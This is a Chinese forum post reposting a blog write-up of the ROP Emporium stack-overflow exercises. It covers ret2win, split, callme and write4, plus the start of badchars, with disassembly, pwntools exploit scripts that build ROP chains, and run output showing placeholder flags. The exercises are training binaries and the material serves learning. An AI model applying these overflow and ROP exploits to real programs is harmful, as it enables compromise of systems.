吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 2056|回复: 22
上一主题 下一主题
收起左侧

[漏洞分析] 栈溢出练习:ROP Emporium

  [复制链接]
跳转到指定楼层
楼主
kn0sky 发表于 2024-8-9 15:50 回帖奖励

[b]个人博客原文链接:https://www.kn0sky.com/?p=938527f1-03c4-4349-8110-5510f7d4b84a

前言

我第一次做这套练习是在初学pwn的时候,隐约记得当时做了一半放弃是卡在了fluff上,当时很复杂,没耐心搞懂bextr和xlat指令就放弃了,现在回过头来,补全当初

这套练习非常适合新手用于栈溢出的学习练习和查缺补漏,关于栈溢出的8个情况,从最基础的覆盖返回地址,到rop,到利用一些机制完成受限的rop,例如栈迁移扩大可控空间,csu操纵寄存器等

本文分享中,非常简单的地方就写的比较简单,不浪费篇幅,复杂的地方分析的内容会比较多

1. ret2win

缓解机制:【NX】

漏洞函数:

.text:00000000004006E8 pwnme           proc near               ; CODE XREF: main+3B↑p
.text:00000000004006E8
.text:00000000004006E8 s               = byte ptr -20h
.text:00000000004006E8
.text:00000000004006E8 ; __unwind {
.text:00000000004006E8                 push    rbp
.text:00000000004006E9                 mov     rbp, rsp
.text:00000000004006EC                 sub     rsp, 20h
.text:00000000004006F0                 lea     rax, [rbp+s]
.text:00000000004006F4                 mov     edx, 20h ; ' '  ; n
.text:00000000004006F9                 mov     esi, 0          ; c
.text:00000000004006FE                 mov     rdi, rax        ; s
.text:0000000000400701                 call    _memset
.text:0000000000400706                 mov     edi, offset aForMyFirstTric ; "For my first trick, I will attempt to f"...
.text:000000000040070B                 call    _puts
.text:0000000000400710                 mov     edi, offset aWhatCouldPossi ; "What could possibly go wrong?"
.text:0000000000400715                 call    _puts
.text:000000000040071A                 mov     edi, offset aYouThereMayIHa ; "You there, may I have your input please"...
.text:000000000040071F                 call    _puts
.text:0000000000400724                 mov     edi, offset format ; "> "
.text:0000000000400729                 mov     eax, 0
.text:000000000040072E                 call    _printf

.text:0000000000400733                 lea     rax, [rbp+s]
.text:0000000000400737                 mov     edx, 38h ; '8'  ; nbytes
.text:000000000040073C                 mov     rsi, rax        ; buf
.text:000000000040073F                 mov     edi, 0          ; fd
.text:0000000000400744                 call    _read

.text:0000000000400749                 mov     edi, offset aThankYou ; "Thank you!"
.text:000000000040074E                 call    _puts
.text:0000000000400753                 nop
.text:0000000000400754                 leave
.text:0000000000400755                 retn
.text:0000000000400755 ; } // starts at 4006E8
.text:0000000000400755 pwnme           endp

read读取0x38字节到变量rbp-0x20中,存在溢出

程序存在后门函数:

.text:0000000000400756 ret2win         proc near
.text:0000000000400756 ; __unwind {
.text:0000000000400756                 push    rbp
.text:0000000000400757                 mov     rbp, rsp
.text:000000000040075A                 mov     edi, offset aWellDoneHereSY ; "Well done! Here's your flag:"
.text:000000000040075F                 call    _puts
.text:0000000000400764                 mov     edi, offset command ; "/bin/cat flag.txt"
.text:0000000000400769                 call    _system
.text:000000000040076E                 nop
.text:000000000040076F                 pop     rbp
.text:0000000000400770                 retn
.text:0000000000400770 ; } // starts at 400756
.text:0000000000400770 ret2win         endp

exp:

#!/bin/python3
from pwn import *
warnings.filterwarnings(action='ignore',category=BytesWarning)
#context.log_level = 'debug'
FILE_NAME = "./ret2win"
REMOTE_HOST = ""
REMOTE_PORT = 0

elf = context.binary = ELF(FILE_NAME)
#libc = elf.libc

gs = '''
continue
'''
def start():
    if args.REMOTE:
        return remote(REMOTE_HOST,REMOTE_PORT)
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs)
    else:
        return process(elf.path)

# =======================================
io = start()

# =============================================================================
# ============== exploit ===================

win = 0x40075A
payload = cyclic(0x28) + pack(win)
io.sendline(payload)

# =============================================================================

io.interactive()

运行结果:

ret2win ➤ ./exp_cli.py '/home/selph/ctf/rop_emporium_all_challenges/ret2win/ret2win'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Starting local process '/home/selph/ctf/rop_emporium_all_challenges/ret2win/ret2win': pid 3847 Switching to interactive mode
ret2win by ROP Emporium
x86_64

For my first trick, I will attempt to fit 56 bytes of user input into 32 bytes of stack buffer!
What could possibly go wrong?
You there, may I have your input please? And don't worry about null bytes, we're using read()!

> Thank you!
Well done! Here's your flag: Process '/home/selph/ctf/rop_emporium_all_challenges/ret2win/ret2win' stopped with exit code 0 (pid 3847)
ROPE{a_placeholder_32byte_flag!} Got EOF while reading in interactive

2. split

缓解机制:【NX】

程序:

.text:00000000004006E8 pwnme           proc near               ; CODE XREF: main+3B↑p
.text:00000000004006E8
.text:00000000004006E8 s               = byte ptr -20h
.text:00000000004006E8
.text:00000000004006E8 ; __unwind {
.text:00000000004006E8                 push    rbp
.text:00000000004006E9                 mov     rbp, rsp
.text:00000000004006EC                 sub     rsp, 20h
.text:00000000004006F0                 lea     rax, [rbp+s]
.text:00000000004006F4                 mov     edx, 20h ; ' '  ; n
.text:00000000004006F9                 mov     esi, 0          ; c
.text:00000000004006FE                 mov     rdi, rax        ; s
.text:0000000000400701                 call    _memset
.text:0000000000400706                 mov     edi, offset aContrivingARea ; "Contriving a reason to ask user for dat"...
.text:000000000040070B                 call    _puts
.text:0000000000400710                 mov     edi, offset format ; "> "
.text:0000000000400715                 mov     eax, 0
.text:000000000040071A                 call    _printf

.text:000000000040071F                 lea     rax, [rbp+s]
.text:0000000000400723                 mov     edx, 60h ; '`'  ; nbytes
.text:0000000000400728                 mov     rsi, rax        ; buf
.text:000000000040072B                 mov     edi, 0          ; fd
.text:0000000000400730                 call    _read

.text:0000000000400735                 mov     edi, offset aThankYou ; "Thank you!"
.text:000000000040073A                 call    _puts
.text:000000000040073F                 nop
.text:0000000000400740                 leave
.text:0000000000400741                 retn
.text:0000000000400741 ; } // starts at 4006E8
.text:0000000000400741 pwnme           endp

read调用存在溢出

程序提供了一些辅助代码:

.text:0000000000400742 usefulFunction  proc near
.text:0000000000400742 ; __unwind {
.text:0000000000400742                 push    rbp
.text:0000000000400743                 mov     rbp, rsp
.text:0000000000400746                 mov     edi, offset command ; "/bin/ls"
.text:000000000040074B                 call    _system
.text:0000000000400750                 nop
.text:0000000000400751                 pop     rbp
.text:0000000000400752                 retn
.text:0000000000400752 ; } // starts at 400742
.data:0000000000601060                 public usefulString
.data:0000000000601060 usefulString    db '/bin/cat flag.txt',0
.data:0000000000601060 _data           ends
.data:0000000000601060

目标是读取flag.txt,这里需要rop修改一下rdi直接跳转到syscall的call上即可

exp:

#!/bin/python3
from pwn import *
warnings.filterwarnings(action='ignore',category=BytesWarning)
context.log_level = 'debug'
FILE_NAME = "./split"
REMOTE_HOST = ""
REMOTE_PORT = 0

elf = context.binary = ELF(FILE_NAME)
libc = elf.libc

gs = '''
continue
'''
def start():
    if args.REMOTE:
        return remote(REMOTE_HOST,REMOTE_PORT)
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs)
    else:
        return process(elf.path)

io = start()

# =============================================================================
# ============== exploit ===================

# 0x00000000004007c3 : pop rdi ; ret
pop_rdi = 0x00000000004007c3
win = 0x40074B
flag = 0x601060
payload = cyclic(0x28) + pack(pop_rdi) + pack(flag) + pack(win)
io.sendline(payload)

# =============================================================================

io.interactive()

运行结果:

split ➤ ./exp_cli.py '/home/selph/ctf/rop_emporium_all_challenges/split/split'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000) '/usr/lib/x86_64-linux-gnu/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
    SHSTK:    Enabled
    IBT:      Enabled
[+] Starting local process '/home/selph/ctf/rop_emporium_all_challenges/split/split' argv=[b'/home/selph/ctf/rop_emporium_all_challenges/split/split'] : pid 7405
[DEBUG] Sent 0x41 bytes:
    00000000  61 61 61 61  62 61 61 61  63 61 61 61  64 61 61 61  │aaaa│baaa│caaa│daaa│
    00000010  65 61 61 61  66 61 61 61  67 61 61 61  68 61 61 61  │eaaa│faaa│gaaa│haaa│
    00000020  69 61 61 61  6a 61 61 61  c3 07 40 00  00 00 00 00  │iaaa│jaaa│··@·│····│
    00000030  60 10 60 00  00 00 00 00  4b 07 40 00  00 00 00 00  │`·`·│····│K·@·│····│
    00000040  0a                                                  │·│
    00000041 Switching to interactive mode
[DEBUG] Received 0x57 bytes:
    b'split by ROP Emporium\n'
    b'x86_64\n'
    b'\n'
    b'Contriving a reason to ask user for data...\n'
    b'> Thank you!\n'
split by ROP Emporium
x86_64

Contriving a reason to ask user for data...
> Thank you!
[DEBUG] Received 0x6b bytes:
    b'ROPE{a_placeholder_32byte_flag!}\n'
    b'split by ROP Emporium\n'
    b'x86_64\n'
    b'\n'
    b'Contriving a reason to ask user for data...\n'
ROPE{a_placeholder_32byte_flag!}
split by ROP Emporium
x86_64

Contriving a reason to ask user for data... Process '/home/selph/ctf/rop_emporium_all_challenges/split/split' stopped with exit code -11 (SIGSEGV) (pid 7405) Got EOF while reading in interactive

3. callme

缓解机制:【NX】

程序:

.text:0000000000400898 pwnme           proc near               ; CODE XREF: main+3B↑p
.text:0000000000400898
.text:0000000000400898 s               = byte ptr -20h
.text:0000000000400898
.text:0000000000400898 ; __unwind {
.text:0000000000400898                 push    rbp
.text:0000000000400899                 mov     rbp, rsp
.text:000000000040089C                 sub     rsp, 20h
.text:00000000004008A0                 lea     rax, [rbp+s]
.text:00000000004008A4                 mov     edx, 20h ; ' '  ; n
.text:00000000004008A9                 mov     esi, 0          ; c
.text:00000000004008AE                 mov     rdi, rax        ; s
.text:00000000004008B1                 call    _memset
.text:00000000004008B6                 mov     edi, offset aHopeYouReadThe ; "Hope you read the instructions...\n"
.text:00000000004008BB                 call    _puts
.text:00000000004008C0                 mov     edi, offset format ; "> "
.text:00000000004008C5                 mov     eax, 0
.text:00000000004008CA                 call    _printf

.text:00000000004008CF                 lea     rax, [rbp+s]
.text:00000000004008D3                 mov     edx, 200h       ; nbytes
.text:00000000004008D8                 mov     rsi, rax        ; buf
.text:00000000004008DB                 mov     edi, 0          ; fd
.text:00000000004008E0                 call    _read

.text:00000000004008E5                 mov     edi, offset aThankYou ; "Thank you!"
.text:00000000004008EA                 call    _puts
.text:00000000004008EF                 nop
.text:00000000004008F0                 leave
.text:00000000004008F1                 retn
.text:00000000004008F1 ; } // starts at 400898
.text:00000000004008F1 pwnme           endp

read调用存在溢出

程序提供了一些辅助代码:

.text:00000000004008F2 usefulFunction  proc near
.text:00000000004008F2 ; __unwind {
.text:00000000004008F2                 push    rbp
.text:00000000004008F3                 mov     rbp, rsp
.text:00000000004008F6                 mov     edx, 6
.text:00000000004008FB                 mov     esi, 5
.text:0000000000400900                 mov     edi, 4
.text:0000000000400905                 call    _callme_three
.text:000000000040090A                 mov     edx, 6
.text:000000000040090F                 mov     esi, 5
.text:0000000000400914                 mov     edi, 4
.text:0000000000400919                 call    _callme_two
.text:000000000040091E                 mov     edx, 6
.text:0000000000400923                 mov     esi, 5
.text:0000000000400928                 mov     edi, 4
.text:000000000040092D                 call    _callme_one
.text:0000000000400932                 mov     edi, 1          ; status
.text:0000000000400937                 call    _exit
.text:0000000000400937 ; } // starts at 4008F2
.text:0000000000400937 usefulFunction  endp
.text:0000000000400937
.text:000000000040093C ; ---------------------------------------------------------------------------
.text:000000000040093C
.text:000000000040093C usefulGadgets:
.text:000000000040093C                 pop     rdi
.text:000000000040093D                 pop     rsi
.text:000000000040093E                 pop     rdx
.text:000000000040093F                 retn

目标是解密flag,看这个意思是让我连续调用三个函数,并用正确的顺序和参数调用

exp:

#!/bin/python3
from pwn import *
warnings.filterwarnings(action='ignore',category=BytesWarning)
context.log_level = 'debug'
FILE_NAME = "callme"
REMOTE_HOST = ""
REMOTE_PORT = 0

elf = context.binary = ELF(FILE_NAME)
libc = elf.libc

gs = '''
b*0x00000000004008f1
continue
'''
def start():
    if args.REMOTE:
        return remote(REMOTE_HOST,REMOTE_PORT)
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs)
    else:
        return process(elf.path)

io = start()

# =============================================================================
# ============== exploit ===================

"""
.plt:0000000000400720 _callme_one     proc near               ; CODE XREF: usefulFunction+3B↓p
.plt:0000000000400720                 jmp     cs:off_601040
.plt:0000000000400720 _callme_one     endp

.plt:0000000000400740 _callme_two     proc near               ; CODE XREF: usefulFunction+27↓p
.plt:0000000000400740                 jmp     cs:off_601050
.plt:0000000000400740 _callme_two     endp

.plt:00000000004006F0 _callme_three   proc near               ; CODE XREF: usefulFunction+13↓p
.plt:00000000004006F0                 jmp     cs:off_601028
.plt:00000000004006F0 _callme_three   endp

.text:000000000040093C                 pop     rdi
.text:000000000040093D                 pop     rsi
.text:000000000040093E                 pop     rdx
.text:000000000040093F                 retn
"""

pop_rdi_rsi_rdx = pack(0x00000000040093C)
callme1         = pack(0x000000000400720)               
callme2         = pack(0x000000000400740)               
callme3         = pack(0x0000000004006F0)               

payload = cyclic(0x28)
payload += pop_rdi_rsi_rdx + pack(0xDEADBEEFDEADBEEF) + pack(0xCAFEBABECAFEBABE) + pack(0xD00DF00DD00DF00D) + callme1
payload += pop_rdi_rsi_rdx + pack(0xDEADBEEFDEADBEEF) + pack(0xCAFEBABECAFEBABE) + pack(0xD00DF00DD00DF00D) + callme2
payload += pop_rdi_rsi_rdx + pack(0xDEADBEEFDEADBEEF) + pack(0xCAFEBABECAFEBABE) + pack(0xD00DF00DD00DF00D) + callme3

io.sendline(payload)

# =============================================================================

io.interactive()

运行结果:

callme ➤ ./exp_cli.py '/home/selph/ctf/rop_emporium_all_challenges/callme/callme'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x3fe000)
    RUNPATH:  b'.' '/home/selph/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Starting local process '/home/selph/ctf/rop_emporium_all_challenges/callme/callme' argv=[b'/home/selph/ctf/rop_emporium_all_challenges/callme/callme'] : pid 23451
[DEBUG] Sent 0xa1 bytes:
    00000000  61 61 61 61  62 61 61 61  63 61 61 61  64 61 61 61  │aaaa│baaa│caaa│daaa│
    00000010  65 61 61 61  66 61 61 61  67 61 61 61  68 61 61 61  │eaaa│faaa│gaaa│haaa│
    00000020  69 61 61 61  6a 61 61 61  3c 09 40 00  00 00 00 00  │iaaa│jaaa│<·@·│····│
    00000030  ef be ad de  ef be ad de  be ba fe ca  be ba fe ca  │····│····│····│····│
    00000040  0d f0 0d d0  0d f0 0d d0  20 07 40 00  00 00 00 00  │····│····│ ·@·│····│
    00000050  3c 09 40 00  00 00 00 00  ef be ad de  ef be ad de  │<·@·│····│····│····│
    00000060  be ba fe ca  be ba fe ca  0d f0 0d d0  0d f0 0d d0  │····│····│····│····│
    00000070  40 07 40 00  00 00 00 00  3c 09 40 00  00 00 00 00  │@·@·│····│<·@·│····│
    00000080  ef be ad de  ef be ad de  be ba fe ca  be ba fe ca  │····│····│····│····│
    00000090  0d f0 0d d0  0d f0 0d d0  f0 06 40 00  00 00 00 00  │····│····│··@·│····│
    000000a0  0a                                                  │·│
    000000a1 Switching to interactive mode
[DEBUG] Received 0xac bytes:
    b'callme by ROP Emporium\n'
    b'x86_64\n'
    b'\n'
    b'Hope you read the instructions...\n'
    b'\n'
    b'> Thank you!\n'
    b'callme_one() called correctly\n'
    b'callme_two() called correctly\n'
    b'ROPE{a_placeholder_32byte_flag!}\n'
callme by ROP Emporium
x86_64

Hope you read the instructions...

> Thank you!
callme_one() called correctly
callme_two() called correctly
ROPE{a_placeholder_32byte_flag!} Process '/home/selph/ctf/rop_emporium_all_challenges/callme/callme' stopped with exit code 0 (pid 23451) Got EOF while reading in interactive

4. write4

缓解机制:【NX】

程序:漏洞函数位于so库中

.text:00000000000008AA
.text:00000000000008AA                 public pwnme
.text:00000000000008AA pwnme           proc near               ; DATA XREF: LOAD:00000000000003E0↑o
.text:00000000000008AA
.text:00000000000008AA s               = byte ptr -20h
.text:00000000000008AA
.text:00000000000008AA ; __unwind {
.text:00000000000008AA                 push    rbp
.text:00000000000008AB                 mov     rbp, rsp
.text:00000000000008AE                 sub     rsp, 20h
.text:00000000000008B2                 mov     rax, cs:stdout_ptr
.text:00000000000008B9                 mov     rax, [rax]
.text:00000000000008BC                 mov     ecx, 0          ; n
.text:00000000000008C1                 mov     edx, 2          ; modes
.text:00000000000008C6                 mov     esi, 0          ; buf
.text:00000000000008CB                 mov     rdi, rax        ; stream
.text:00000000000008CE                 call    _setvbuf
.text:00000000000008D3                 lea     rdi, s          ; "write4 by ROP Emporium"
.text:00000000000008DA                 call    _puts
.text:00000000000008DF                 lea     rdi, aX8664     ; "x86_64\n"
.text:00000000000008E6                 call    _puts
.text:00000000000008EB                 lea     rax, [rbp+s]
.text:00000000000008EF                 mov     edx, 20h ; ' '  ; n
.text:00000000000008F4                 mov     esi, 0          ; c
.text:00000000000008F9                 mov     rdi, rax        ; s
.text:00000000000008FC                 call    _memset
.text:0000000000000901                 lea     rdi, aGoAheadAndGive ; "Go ahead and give me the input already!"...
.text:0000000000000908                 call    _puts
.text:000000000000090D                 lea     rdi, format     ; "> "
.text:0000000000000914                 mov     eax, 0
.text:0000000000000919                 call    _printf

.text:000000000000091E                 lea     rax, [rbp+s]
.text:0000000000000922                 mov     edx, 200h       ; nbytes
.text:0000000000000927                 mov     rsi, rax        ; buf
.text:000000000000092A                 mov     edi, 0          ; fd
.text:000000000000092F                 call    _read

.text:0000000000000934                 lea     rdi, aThankYou  ; "Thank you!"
.text:000000000000093B                 call    _puts
.text:0000000000000940                 nop
.text:0000000000000941                 leave
.text:0000000000000942                 retn
.text:0000000000000942 ; } // starts at 8AA
.text:0000000000000942 pwnme           endp

read调用存在溢出

程序提供了一些辅助代码:

.text:0000000000400617 usefulFunction  proc near
.text:0000000000400617 ; __unwind {
.text:0000000000400617                 push    rbp
.text:0000000000400618                 mov     rbp, rsp
.text:000000000040061B                 mov     edi, offset aNonexistent ; "nonexistent"
.text:0000000000400620                 call    _print_file
.text:0000000000400625                 nop
.text:0000000000400626                 pop     rbp
.text:0000000000400627                 retn
.text:0000000000400627 ; } // starts at 400617
.text:0000000000400627 usefulFunction  endp
.text:0000000000400627
.text:0000000000400628
.text:0000000000400628 ; =============== S U B R O U T I N E =======================================
.text:0000000000400628
.text:0000000000400628
.text:0000000000400628 usefulGadgets   proc near
.text:0000000000400628                 mov     [r14], r15
.text:000000000040062B                 retn
.text:000000000040062B usefulGadgets   endp

这里的print_file:

.text:0000000000000943                 public print_file
.text:0000000000000943 print_file      proc near               ; DATA XREF: LOAD:00000000000003B0↑o
.text:0000000000000943
.text:0000000000000943 filename        = qword ptr -38h
.text:0000000000000943 s               = byte ptr -30h
.text:0000000000000943 stream          = qword ptr -8
.text:0000000000000943
.text:0000000000000943 ; __unwind {
.text:0000000000000943                 push    rbp
.text:0000000000000944                 mov     rbp, rsp
.text:0000000000000947                 sub     rsp, 40h
.text:000000000000094B                 mov     [rbp+filename], rdi
.text:000000000000094F                 mov     [rbp+stream], 0
.text:0000000000000957                 mov     rax, [rbp+filename]
.text:000000000000095B                 lea     rsi, modes      ; "r"
.text:0000000000000962                 mov     rdi, rax        ; filename
.text:0000000000000965                 call    _fopen
.text:000000000000096A                 mov     [rbp+stream], rax
.text:000000000000096E                 cmp     [rbp+stream], 0
.text:0000000000000973                 jnz     short loc_997
.text:0000000000000975                 mov     rax, [rbp+filename]
.text:0000000000000979                 mov     rsi, rax
.text:000000000000097C                 lea     rdi, aFailedToOpenFi ; "Failed to open file: %s\n"
.text:0000000000000983                 mov     eax, 0
.text:0000000000000988                 call    _printf
.text:000000000000098D                 mov     edi, 1          ; status
.text:0000000000000992                 call    _exit
.text:0000000000000997 ; ---------------------------------------------------------------------------
.text:0000000000000997
.text:0000000000000997 loc_997:                                ; CODE XREF: print_file+30↑j
.text:0000000000000997                 mov     rdx, [rbp+stream] ; stream
.text:000000000000099B                 lea     rax, [rbp+s]
.text:000000000000099F                 mov     esi, 21h ; '!'  ; n
.text:00000000000009A4                 mov     rdi, rax        ; s
.text:00000000000009A7                 call    _fgets
.text:00000000000009AC                 lea     rax, [rbp+s]
.text:00000000000009B0                 mov     rdi, rax        ; s
.text:00000000000009B3                 call    _puts
.text:00000000000009B8                 mov     rax, [rbp+stream]
.text:00000000000009BC                 mov     rdi, rax        ; stream
.text:00000000000009BF                 call    _fclose
.text:00000000000009C4                 mov     [rbp+stream], 0
.text:00000000000009CC                 nop
.text:00000000000009CD                 leave
.text:00000000000009CE                 retn
.text:00000000000009CE ; } // starts at 943

目标是读取flag.txt,这里需要rop修改一下rdi指向flag.txt文件名,直接跳转到print_file的call上即可

exp:

#!/bin/python3
from pwn import *
warnings.filterwarnings(action='ignore',category=BytesWarning)
context.log_level = 'debug'
FILE_NAME = "write4"
REMOTE_HOST = ""
REMOTE_PORT = 0

elf = context.binary = ELF(FILE_NAME)
libc = elf.libc

gs = '''
continue
'''
def start():
    if args.REMOTE:
        return remote(REMOTE_HOST,REMOTE_PORT)
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs)
    else:
        return process(elf.path)

# =======================================

io = start()

# =============================================================================
# ============== exploit ===================
bss = 0x000000000601038
# 0x0000000000400690 : pop r14 ; pop r15 ; ret
# 0x0000000000400628 : mov qword ptr [r14], r15 ; ret
print_file = 0x000000000400620

rop = ROP(elf)
rop.raw(0x0000000000400690)
rop.raw(bss)
rop.raw(b'flag.txt')
rop.raw(0x0000000000400628)
rop.rdi = bss
rop.raw(print_file)
print(rop.dump())

payload = cyclic(0x28) + rop.chain()
io.sendline(payload)
# =============================================================================

io.interactive()

运行结果:

write4 ➤ ./exp_cli.py '/home/selph/ctf/rop_emporium_all_challenges/write4/write4'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
    RUNPATH:  b'.' '/usr/lib/x86_64-linux-gnu/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
    SHSTK:    Enabled
    IBT:      Enabled
[+] Starting local process '/home/selph/ctf/rop_emporium_all_challenges/write4/write4' argv=[b'/home/selph/ctf/rop_emporium_all_challenges/write4/write4'] : pid 28217 Loaded 13 cached gadgets for 'write4'
0x0000:         0x400690 pop r14; pop r15; ret
0x0008:         0x601038 _edata
0x0010:      b'flag.txt' b'flag.txt'
0x0018:         0x400628 usefulGadgets
0x0020:         0x400693 pop rdi; ret
0x0028:         0x601038 _edata
0x0030:         0x400620
[DEBUG] Sent 0x61 bytes:
    00000000  61 61 61 61  62 61 61 61  63 61 61 61  64 61 61 61  │aaaa│baaa│caaa│daaa│
    00000010  65 61 61 61  66 61 61 61  67 61 61 61  68 61 61 61  │eaaa│faaa│gaaa│haaa│
    00000020  69 61 61 61  6a 61 61 61  90 06 40 00  00 00 00 00  │iaaa│jaaa│··@·│····│
    00000030  38 10 60 00  00 00 00 00  66 6c 61 67  2e 74 78 74  │8·`·│····│flag│.txt│
    00000040  28 06 40 00  00 00 00 00  93 06 40 00  00 00 00 00  │(·@·│····│··@·│····│
    00000050  38 10 60 00  00 00 00 00  20 06 40 00  00 00 00 00  │8·`·│····│ ·@·│····│
    00000060  0a                                                  │·│
    00000061 Switching to interactive mode
[DEBUG] Received 0x76 bytes:
    b'write4 by ROP Emporium\n'
    b'x86_64\n'
    b'\n'
    b'Go ahead and give me the input already!\n'
    b'\n'
    b'> Thank you!\n'
    b'ROPE{a_placeholder_32byte_flag!}\n'
write4 by ROP Emporium
x86_64

Go ahead and give me the input already!

> Thank you!
ROPE{a_placeholder_32byte_flag!} Process '/home/selph/ctf/rop_emporium_all_challenges/write4/write4' stopped with exit code -11 (SIGSEGV) (pid 28217) Got EOF while reading in interactive

5. badchars

缓解机制:【NX】

程序:

.text:00000000000008FA ; int pwnme()
.text:00000000000008FA                 public pwnme
.text:00000000000008FA pwnme           proc near               ; DATA XREF: LOAD:00000000000003E8↑o
.text:00000000000008FA
.text:00000000000008FA var_40          = qword ptr -40h
.text:00000000000008FA var_38          = qword ptr -38h
.text:00000000000008FA var_30          = qword ptr -30h
.text:00000000000008FA var_20          = byte ptr -20h
.text:00000000000008FA
.text:00000000000008FA ; __unwind {
.text:00000000000008FA                 push    rbp
.text:00000000000008FB                 mov     rbp, rsp
.text:00000000000008FE                 sub     rsp, 40h
.text:0000000000000902                 mov     rax, cs:stdout_ptr
.text:0000000000000909                 mov     rax, [rax]
.text:000000000000090C                 mov     ecx, 0          ; n
.text:0000000000000911                 mov     edx, 2          ; modes
.text:0000000000000916                 mov     esi, 0          ; buf
.text:000000000000091B                 mov     rdi, rax        ; stream
.text:000000000000091E                 call    _setvbuf
.text:0000000000000923                 lea     rdi, s          ; "badchars by ROP Emporium"
.text:000000000000092A                 call    _puts
.text:000000000000092F                 lea     rdi, aX8664     ; "x86_64\n"
.text:0000000000000936                 call    _puts
.text:000000000000093B                 lea     rax, [rbp+var_40]
.text:000000000000093F                 add     rax, 20h ; ' '
.text:0000000000000943                 mov     edx, 20h ; ' '  ; n
.text:0000000000000948                 mov     esi, 0          ; c
.text:000000000000094D                 mov     rdi, rax        ; s
.text:0000000000000950                 call    _memset
.text:0000000000000955                 lea     rdi, aBadcharsAreXGA ; "badchars are: 'x', 'g', 'a', '.'"
.text:000000000000095C                 call    _puts
.text:0000000000000961                 lea     rdi, format     ; "> "
.text:0000000000000968                 mov     eax, 0
.text:000000000000096D                 call    _printf

.text:0000000000000972                 lea     rax, [rbp+var_40]
.text:0000000000000976                 add     rax, 20h ; ' '
.text:000000000000097A                 mov     edx, 200h       ; nbytes
.text:000000000000097F                 mov     rsi, rax        ; buf
.text:0000000000000982                 mov     edi, 0          ; fd
.text:0000000000000987                 call    _read

.text:000000000000098C                 mov     [rbp+var_40], rax
.text:0000000000000990                 mov     [rbp+var_38], 0
.text:0000000000000998                 jmp     short loc_9EB
.text:000000000000099A ; ---------------------------------------------------------------------------
.text:000000000000099A
.text:000000000000099A loc_99A:                                ; CODE XREF: pwnme+FC↓j
.text:000000000000099A                 mov     [rbp+var_30], 0
.text:00000000000009A2                 jmp     short loc_9D5
.text:00000000000009A4 ; ---------------------------------------------------------------------------
.text:00000000000009A4
.text:00000000000009A4 loc_9A4:                                ; CODE XREF: pwnme+E3↓j
.text:00000000000009A4                 mov     rax, [rbp+var_38]
.text:00000000000009A8                 movzx   ecx, [rbp+rax+var_20]
.text:00000000000009AD                 mov     rax, [rbp+var_30]
.text:00000000000009B1                 mov     rdx, cs:badcharacters_ptr
.text:00000000000009B8                 movzx   eax, byte ptr [rdx+rax]
.text:00000000000009BC                 cmp     cl, al
.text:00000000000009BE                 jnz     short loc_9C9
.text:00000000000009C0                 mov     rax, [rbp+var_38]
.text:00000000000009C4                 mov     [rbp+rax+var_20], 0EBh
.text:00000000000009C9
.text:00000000000009C9 loc_9C9:                                ; CODE XREF: pwnme+C4↑j
.text:00000000000009C9                 mov     rax, [rbp+var_30]
.text:00000000000009CD                 add     rax, 1
.text:00000000000009D1                 mov     [rbp+var_30], rax
.text:00000000000009D5
.text:00000000000009D5 loc_9D5:                                ; CODE XREF: pwnme+A8↑j
.text:00000000000009D5                 mov     rax, [rbp+var_30]
.text:00000000000009D9                 cmp     rax, 3
.text:00000000000009DD                 jbe     short loc_9A4
.text:00000000000009DF                 mov     rax, [rbp+var_38]
.text:00000000000009E3                 add     rax, 1
.text:00000000000009E7                 mov     [rbp+var_38], rax
.text:00000000000009EB
.text:00000000000009EB loc_9EB:                                ; CODE XREF: pwnme+9E↑j
.text:00000000000009EB                 mov     rdx, [rbp+var_38]
.text:00000000000009EF                 mov     rax, [rbp+var_40]
.text:00000000000009F3                 cmp     rdx, rax
.text:00000000000009F6                 jb      short loc_99A
.text:00000000000009F8                 lea     rdi, aThankYou  ; "Thank you!"
.text:00000000000009FF                 call    _puts
.text:0000000000000A04                 nop
.text:0000000000000A05                 leave
.text:0000000000000A06                 retn
.text:0000000000000A06 ; } // starts at 8FA
.text:0000000000000A06 pwnme           endp

read调用存在溢出,过滤了4个字符:'x', 'g', 'a', '.'​,漏洞程序在so库里

程序提供了一些辅助代码:

.text:0000000000400617 ; Attributes: bp-based frame
.text:0000000000400617
.text:0000000000400617 usefulFunction  proc near
.text:0000000000400617 ; __unwind {
.text:0000000000400617                 push    rbp
.text:0000000000400618                 mov     rbp, rsp
.text:000000000040061B                 mov     edi, offset aNonexistent ; "nonexistent"
.text:0000000000400620                 call    _print_file
.text:0000000000400625                 nop
.text:0000000000400626                 pop     rbp
.text:0000000000400627                 retn
.text:0000000000400627 ; } // starts at 400617
.text:0000000000400627 usefulFunction  endp
.text:0000000000400627
.text:0000000000400628 ; ---------------------------------------------------------------------------
.text:0000000000400628
.text:0000000000400628 usefulGadgets:
.text:0000000000400628                 xor     [r15], r14b
.text:000000000040062B                 retn
.text:000000000040062C ; ---------------------------------------------------------------------------
.text:000000000040062C                 add     [r15], r14b
.text:000000000040062F                 retn
.text:0000000000400630 ; ---------------------------------------------------------------------------
.text:0000000000400630                 sub     [r15], r14b
.text:0000000000400633                 retn
.text:0000000000400634
.text:0000000000400634 ; =============== S U B R O U T I N E =======================================
.text:0000000000400634
.text:0000000000400634
.text:0000000000400634 sub_400634      proc near
.text:0000000000400634                 mov     [r13+0], r12
.text:0000000000400638                 retn
